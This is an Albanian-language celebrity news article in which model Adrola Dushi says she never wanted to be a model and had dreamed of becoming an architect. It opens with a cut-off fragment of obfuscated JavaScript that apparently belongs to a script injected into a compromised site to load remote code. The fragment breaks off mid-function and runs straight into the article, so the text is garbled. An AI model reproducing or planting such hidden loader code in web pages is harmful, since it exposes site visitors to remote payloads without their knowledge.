;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Përfundoi si modele por ky ishte profesioni i ëndrrave për Adrola Dushin!

By

Shumë vajza, që të vogla duan të jenë modele, të bëhen Miss e i inskenojnë konkurset e bukurisë në mëhallat ku jetojnë.

Të gjithë e kemi luajtur këtë lojë ku shpallej më e bukura e lagjes dikush!

Por Adrola Dushi, ndonëse me një karrierë shumë të suksesshme prej modeleje, nuk e kishte këtë ëndërr që fëmijë. Modelja shqiptare ka rrëfyer për Prive, se gjithmonë e kishte ëndërruar një profesion tjetër, që s’kishte të bënte aspak me botën e spektaklit dhe fushën e bukurisë.

“Jam rritur në një qytet të vogël dhe unë kam thënë gjithmonë jam fanatike dhe nuk kam ëndërruar kurrë të bëhem modele. Nuk e di se si jam bërë modele apo miss. Ëndrra ime ishte të bëhesha arkitekte, ngase vëllai im ka studiuar për arkitekturë dhe e adhuroja punën që ai bënte. Më dështoi, nuk i dihet kurrë jetës por momentalisht jam modele!”.

Këtë e ka thënë në intervistën e saj të fundit dhënë për Prive, ku ka treguar 10-të gjërat që s’i kemi ditur për të!

Artikuj të ngjashëm